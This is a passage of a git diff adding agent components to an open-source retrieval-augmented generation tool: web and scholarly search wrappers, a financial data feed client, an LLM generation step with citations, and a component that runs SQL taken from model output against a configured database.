def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return DuckDuckGo.be_output("")
|
||||
|
||||
try:
|
||||
if self._param.channel == "text":
|
||||
with DDGS() as ddgs:
|
||||
# {'title': '', 'href': '', 'body': ''}
|
||||
duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
|
||||
in ddgs.text(ans, max_results=self._param.top_n)]
|
||||
elif self._param.channel == "news":
|
||||
with DDGS() as ddgs:
|
||||
# {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
|
||||
duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
|
||||
in ddgs.news(ans, max_results=self._param.top_n)]
|
||||
except Exception as e:
|
||||
return DuckDuckGo.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not duck_res:
|
||||
return DuckDuckGo.be_output("")
|
||||
|
||||
df = pd.DataFrame(duck_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
99
agent/component/exesql.py
Normal file
99
agent/component/exesql.py
Normal file
@ -0,0 +1,99 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import re
|
||||
import pandas as pd
|
||||
from peewee import MySQLDatabase, PostgresqlDatabase
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class ExeSQLParam(ComponentParamBase):
|
||||
"""
|
||||
Define the ExeSQL component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.db_type = "mysql"
|
||||
self.database = ""
|
||||
self.username = ""
|
||||
self.host = ""
|
||||
self.port = 3306
|
||||
self.password = ""
|
||||
self.loop = 3
|
||||
self.top_n = 30
|
||||
|
||||
def check(self):
|
||||
self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb'])
|
||||
self.check_empty(self.database, "Database name")
|
||||
self.check_empty(self.username, "database username")
|
||||
self.check_empty(self.host, "IP Address")
|
||||
self.check_positive_integer(self.port, "IP Port")
|
||||
self.check_empty(self.password, "Database password")
|
||||
self.check_positive_integer(self.top_n, "Number of records")
|
||||
|
||||
|
||||
class ExeSQL(ComponentBase, ABC):
|
||||
component_name = "ExeSQL"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if not hasattr(self, "_loop"):
|
||||
setattr(self, "_loop", 0)
|
||||
if self._loop >= self._param.loop:
|
||||
self._loop = 0
|
||||
raise Exception("Maximum loop time exceeds. Can't query the correct data via SQL statement.")
|
||||
self._loop += 1
|
||||
|
||||
ans = self.get_input()
|
||||
ans = "".join(ans["content"]) if "content" in ans else ""
|
||||
ans = re.sub(r'^.*?SELECT ', 'SELECT ', repr(ans), flags=re.IGNORECASE)
|
||||
ans = re.sub(r';.*?SELECT ', '; SELECT ', ans, flags=re.IGNORECASE)
|
||||
ans = re.sub(r';[^;]*$', r';', ans)
|
||||
if not ans:
|
||||
raise Exception("SQL statement not found!")
|
||||
|
||||
if self._param.db_type in ["mysql", "mariadb"]:
|
||||
db = MySQLDatabase(self._param.database, user=self._param.username, host=self._param.host,
|
||||
port=self._param.port, password=self._param.password)
|
||||
elif self._param.db_type == 'postgresql':
|
||||
db = PostgresqlDatabase(self._param.database, user=self._param.username, host=self._param.host,
|
||||
port=self._param.port, password=self._param.password)
|
||||
|
||||
try:
|
||||
db.connect()
|
||||
except Exception as e:
|
||||
raise Exception("Database Connection Failed! \n" + str(e))
|
||||
sql_res = []
|
||||
for single_sql in re.split(r';', ans.replace(r"\n", " ")):
|
||||
if not single_sql:
|
||||
continue
|
||||
try:
|
||||
query = db.execute_sql(single_sql)
|
||||
if query.rowcount == 0:
|
||||
sql_res.append({"content": "\nTotal: " + str(query.rowcount) + "\n No record in the database!"})
|
||||
continue
|
||||
single_res = pd.DataFrame([i for i in query.fetchmany(size=self._param.top_n)])
|
||||
single_res.columns = [i[0] for i in query.description]
|
||||
sql_res.append({"content": "\nTotal: " + str(query.rowcount) + "\n" + single_res.to_markdown()})
|
||||
except Exception as e:
|
||||
sql_res.append({"content": "**Error**:" + str(e) + "\nError SQL Statement:" + single_sql})
|
||||
pass
|
||||
db.close()
|
||||
|
||||
if not sql_res:
|
||||
return ExeSQL.be_output("")
|
||||
|
||||
return pd.DataFrame(sql_res)
|
||||
155
agent/component/generate.py
Normal file
155
agent/component/generate.py
Normal file
@ -0,0 +1,155 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from functools import partial
|
||||
import pandas as pd
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class GenerateParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Generate component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.llm_id = ""
|
||||
self.prompt = ""
|
||||
self.max_tokens = 0
|
||||
self.temperature = 0
|
||||
self.top_p = 0
|
||||
self.presence_penalty = 0
|
||||
self.frequency_penalty = 0
|
||||
self.cite = True
|
||||
self.parameters = []
|
||||
|
||||
def check(self):
|
||||
self.check_decimal_float(self.temperature, "[Generate] Temperature")
|
||||
self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
|
||||
self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
|
||||
self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
|
||||
self.check_decimal_float(self.top_p, "[Generate] Top P")
|
||||
self.check_empty(self.llm_id, "[Generate] LLM")
|
||||
# self.check_defined_type(self.parameters, "Parameters", ["list"])
|
||||
|
||||
def gen_conf(self):
|
||||
conf = {}
|
||||
if self.max_tokens > 0: conf["max_tokens"] = self.max_tokens
|
||||
if self.temperature > 0: conf["temperature"] = self.temperature
|
||||
if self.top_p > 0: conf["top_p"] = self.top_p
|
||||
if self.presence_penalty > 0: conf["presence_penalty"] = self.presence_penalty
|
||||
if self.frequency_penalty > 0: conf["frequency_penalty"] = self.frequency_penalty
|
||||
return conf
|
||||
|
||||
|
||||
class Generate(ComponentBase):
|
||||
component_name = "Generate"
|
||||
|
||||
def get_dependent_components(self):
|
||||
cpnts = [para["component_id"] for para in self._param.parameters]
|
||||
return cpnts
|
||||
|
||||
def set_cite(self, retrieval_res, answer):
|
||||
retrieval_res = retrieval_res.dropna(subset=["vector", "content_ltks"]).reset_index(drop=True)
|
||||
if "empty_response" in retrieval_res.columns:
|
||||
retrieval_res["empty_response"].fillna("", inplace=True)
|
||||
answer, idx = retrievaler.insert_citations(answer, [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
|
||||
[ck["vector"] for _, ck in retrieval_res.iterrows()],
|
||||
LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
|
||||
self._canvas.get_embedding_model()), tkweight=0.7,
|
||||
vtweight=0.3)
|
||||
doc_ids = set([])
|
||||
recall_docs = []
|
||||
for i in idx:
|
||||
did = retrieval_res.loc[int(i), "doc_id"]
|
||||
if did in doc_ids: continue
|
||||
doc_ids.add(did)
|
||||
recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
|
||||
|
||||
del retrieval_res["vector"]
|
||||
del retrieval_res["content_ltks"]
|
||||
|
||||
reference = {
|
||||
"chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
|
||||
"doc_aggs": recall_docs
|
||||
}
|
||||
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
res = {"content": answer, "reference": reference}
|
||||
|
||||
return res
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
prompt = self._param.prompt
|
||||
|
||||
retrieval_res = self.get_input()
|
||||
input = (" - " + "\n - ".join(retrieval_res["content"])) if "content" in retrieval_res else ""
|
||||
for para in self._param.parameters:
|
||||
cpn = self._canvas.get_component(para["component_id"])["obj"]
|
||||
_, out = cpn.output(allow_partial=False)
|
||||
if "content" not in out.columns:
|
||||
kwargs[para["key"]] = "Nothing"
|
||||
else:
|
||||
kwargs[para["key"]] = " - " + "\n - ".join(out["content"])
|
||||
|
||||
kwargs["input"] = input
|
||||
for n, v in kwargs.items():
|
||||
prompt = re.sub(r"\{%s\}" % n, re.escape(str(v)), prompt)
|
||||
|
||||
downstreams = self._canvas.get_component(self._id)["downstream"]
|
||||
if kwargs.get("stream") and len(downstreams) == 1 and self._canvas.get_component(downstreams[0])[
|
||||
"obj"].component_name.lower() == "answer":
|
||||
return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
|
||||
|
||||
if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
|
||||
res = {"content": "\n- ".join(retrieval_res["empty_response"]) if "\n- ".join(
|
||||
retrieval_res["empty_response"]) else "Nothing found in knowledgebase!", "reference": []}
|
||||
return Generate.be_output(res)
|
||||
|
||||
ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
|
||||
self._param.gen_conf())
|
||||
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
|
||||
df = self.set_cite(retrieval_res, ans)
|
||||
return pd.DataFrame(df)
|
||||
|
||||
return Generate.be_output(ans)
|
||||
|
||||
def stream_output(self, chat_mdl, prompt, retrieval_res):
|
||||
res = None
|
||||
if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
|
||||
res = {"content": "\n- ".join(retrieval_res["empty_response"]) if "\n- ".join(
|
||||
retrieval_res["empty_response"]) else "Nothing found in knowledgebase!", "reference": []}
|
||||
yield res
|
||||
self.set_output(res)
|
||||
return
|
||||
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
|
||||
self._param.gen_conf()):
|
||||
res = {"content": ans, "reference": []}
|
||||
answer = ans
|
||||
yield res
|
||||
|
||||
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
|
||||
res = self.set_cite(retrieval_res, answer)
|
||||
yield res
|
||||
|
||||
self.set_output(res)
|
||||
61
agent/component/github.py
Normal file
61
agent/component/github.py
Normal file
@ -0,0 +1,61 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import requests
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class GitHubParam(ComponentParamBase):
|
||||
"""
|
||||
Define the GitHub component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
|
||||
class GitHub(ComponentBase, ABC):
|
||||
component_name = "GitHub"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return GitHub.be_output("")
|
||||
|
||||
try:
|
||||
url = 'https://api.github.com/search/repositories?q=' + ans + '&sort=stars&order=desc&per_page=' + str(
|
||||
self._param.top_n)
|
||||
headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
|
||||
response = requests.get(url=url, headers=headers).json()
|
||||
|
||||
github_res = [{"content": '<a href="' + i["html_url"] + '">' + i["name"] + '</a>' + str(
|
||||
i["description"]) + '\n stars:' + str(i['watchers'])} for i in response['items']]
|
||||
except Exception as e:
|
||||
return GitHub.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not github_res:
|
||||
return GitHub.be_output("")
|
||||
|
||||
df = pd.DataFrame(github_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
96
agent/component/google.py
Normal file
96
agent/component/google.py
Normal file
@ -0,0 +1,96 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from serpapi import GoogleSearch
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class GoogleParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Google component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.api_key = "xxx"
|
||||
self.country = "cn"
|
||||
self.language = "en"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_empty(self.api_key, "SerpApi API key")
|
||||
self.check_valid_value(self.country, "Google Country",
|
||||
['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
|
||||
'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
|
||||
'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
|
||||
'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
|
||||
'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
|
||||
'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
|
||||
'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
|
||||
'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
|
||||
'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
|
||||
'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
|
||||
'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
|
||||
'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
|
||||
'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
|
||||
'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
|
||||
'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
|
||||
'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
|
||||
'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
|
||||
'zm', 'zw'])
|
||||
self.check_valid_value(self.language, "Google languages",
|
||||
['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
|
||||
'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
|
||||
'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
|
||||
'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
|
||||
'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
|
||||
'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
|
||||
'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
|
||||
'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
|
||||
'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
|
||||
'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
|
||||
'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
|
||||
'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
|
||||
)
|
||||
|
||||
|
||||
class Google(ComponentBase, ABC):
|
||||
component_name = "Google"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Google.be_output("")
|
||||
|
||||
try:
|
||||
client = GoogleSearch(
|
||||
{"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
|
||||
"hl": self._param.language, "num": self._param.top_n})
|
||||
google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]} for i in
|
||||
client.get_dict()["organic_results"]]
|
||||
except Exception as e:
|
||||
return Google.be_output("**ERROR**: Existing Unavailable Parameters!")
|
||||
|
||||
if not google_res:
|
||||
return Google.be_output("")
|
||||
|
||||
df = pd.DataFrame(google_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
70
agent/component/googlescholar.py
Normal file
70
agent/component/googlescholar.py
Normal file
@ -0,0 +1,70 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
from scholarly import scholarly
|
||||
|
||||
|
||||
class GoogleScholarParam(ComponentParamBase):
|
||||
"""
|
||||
Define the GoogleScholar component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 6
|
||||
self.sort_by = 'relevance'
|
||||
self.year_low = None
|
||||
self.year_high = None
|
||||
self.patents = True
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
|
||||
self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
|
||||
|
||||
|
||||
class GoogleScholar(ComponentBase, ABC):
|
||||
component_name = "GoogleScholar"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return GoogleScholar.be_output("")
|
||||
|
||||
scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
|
||||
year_high=self._param.year_high, sort_by=self._param.sort_by)
|
||||
scholar_res = []
|
||||
for i in range(self._param.top_n):
|
||||
try:
|
||||
pub = next(scholar_client)
|
||||
scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
|
||||
'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
|
||||
'bib'].get('abstract', 'no abstract')})
|
||||
|
||||
except StopIteration or Exception as e:
|
||||
print("**ERROR** " + str(e))
|
||||
break
|
||||
|
||||
if not scholar_res:
|
||||
return GoogleScholar.be_output("")
|
||||
|
||||
df = pd.DataFrame(scholar_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
130
agent/component/jin10.py
Normal file
130
agent/component/jin10.py
Normal file
@ -0,0 +1,130 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import requests
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class Jin10Param(ComponentParamBase):
|
||||
"""
|
||||
Define the Jin10 component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.type = "flash"
|
||||
self.secret_key = "xxx"
|
||||
self.flash_type = '1'
|
||||
self.calendar_type = 'cj'
|
||||
self.calendar_datatype = 'data'
|
||||
self.symbols_type = 'GOODS'
|
||||
self.symbols_datatype = 'symbols'
|
||||
self.contain = ""
|
||||
self.filter = ""
|
||||
|
||||
def check(self):
|
||||
self.check_valid_value(self.type, "Type", ['flash', 'calendar', 'symbols', 'news'])
|
||||
self.check_valid_value(self.flash_type, "Flash Type", ['1', '2', '3', '4', '5'])
|
||||
self.check_valid_value(self.calendar_type, "Calendar Type", ['cj', 'qh', 'hk', 'us'])
|
||||
self.check_valid_value(self.calendar_datatype, "Calendar DataType", ['data', 'event', 'holiday'])
|
||||
self.check_valid_value(self.symbols_type, "Symbols Type", ['GOODS', 'FOREX', 'FUTURE', 'CRYPTO'])
|
||||
self.check_valid_value(self.symbols_datatype, 'Symbols DataType', ['symbols', 'quotes'])
|
||||
|
||||
|
||||
class Jin10(ComponentBase, ABC):
|
||||
component_name = "Jin10"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Jin10.be_output("")
|
||||
|
||||
jin10_res = []
|
||||
headers = {'secret-key': self._param.secret_key}
|
||||
try:
|
||||
if self._param.type == "flash":
|
||||
params = {
|
||||
'category': self._param.flash_type,
|
||||
'contain': self._param.contain,
|
||||
'filter': self._param.filter
|
||||
}
|
||||
response = requests.get(
|
||||
url='https://open-data-api.jin10.com/data-api/flash?category=' + self._param.flash_type,
|
||||
headers=headers, data=json.dumps(params))
|
||||
response = response.json()
|
||||
for i in response['data']:
|
||||
jin10_res.append({"content": i['data']['content']})
|
||||
if self._param.type == "calendar":
|
||||
params = {
|
||||
'category': self._param.calendar_type
|
||||
}
|
||||
response = requests.get(
|
||||
url='https://open-data-api.jin10.com/data-api/calendar/' + self._param.calendar_datatype + '?category=' + self._param.calendar_type,
|
||||
headers=headers, data=json.dumps(params))
|
||||
|
||||
response = response.json()
|
||||
jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
|
||||
if self._param.type == "symbols":
|
||||
params = {
|
||||
'type': self._param.symbols_type
|
||||
}
|
||||
if self._param.symbols_datatype == "quotes":
|
||||
params['codes'] = 'BTCUSD'
|
||||
response = requests.get(
|
||||
url='https://open-data-api.jin10.com/data-api/' + self._param.symbols_datatype + '?type=' + self._param.symbols_type,
|
||||
headers=headers, data=json.dumps(params))
|
||||
response = response.json()
|
||||
if self._param.symbols_datatype == "symbols":
|
||||
for i in response['data']:
|
||||
i['Commodity Code'] = i['c']
|
||||
i['Stock Exchange'] = i['e']
|
||||
i['Commodity Name'] = i['n']
|
||||
i['Commodity Type'] = i['t']
|
||||
del i['c'], i['e'], i['n'], i['t']
|
||||
if self._param.symbols_datatype == "quotes":
|
||||
for i in response['data']:
|
||||
i['Selling Price'] = i['a']
|
||||
i['Buying Price'] = i['b']
|
||||
i['Commodity Code'] = i['c']
|
||||
i['Stock Exchange'] = i['e']
|
||||
i['Highest Price'] = i['h']
|
||||
i['Yesterday’s Closing Price'] = i['hc']
|
||||
i['Lowest Price'] = i['l']
|
||||
i['Opening Price'] = i['o']
|
||||
i['Latest Price'] = i['p']
|
||||
i['Market Quote Time'] = i['t']
|
||||
del i['a'], i['b'], i['c'], i['e'], i['h'], i['hc'], i['l'], i['o'], i['p'], i['t']
|
||||
jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
|
||||
if self._param.type == "news":
|
||||
params = {
|
||||
'contain': self._param.contain,
|
||||
'filter': self._param.filter
|
||||
}
|
||||
response = requests.get(
|
||||
url='https://open-data-api.jin10.com/data-api/news',
|
||||
headers=headers, data=json.dumps(params))
|
||||
response = response.json()
|
||||
jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
|
||||
except Exception as e:
|
||||
return Jin10.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not jin10_res:
|
||||
return Jin10.be_output("")
|
||||
|
||||
return pd.DataFrame(jin10_res)
|
||||
65
agent/component/keyword.py
Normal file
65
agent/component/keyword.py
Normal file
@ -0,0 +1,65 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from agent.component import GenerateParam, Generate
|
||||
from agent.settings import DEBUG
|
||||
|
||||
|
||||
class KeywordExtractParam(GenerateParam):
|
||||
"""
|
||||
Define the KeywordExtract component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 1
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
- Role: You're a question analyzer.
|
||||
- Requirements:
|
||||
- Summarize user's question, and give top %s important keyword/phrase.
|
||||
- Use comma as a delimiter to separate keywords/phrases.
|
||||
- Answer format: (in language of user's question)
|
||||
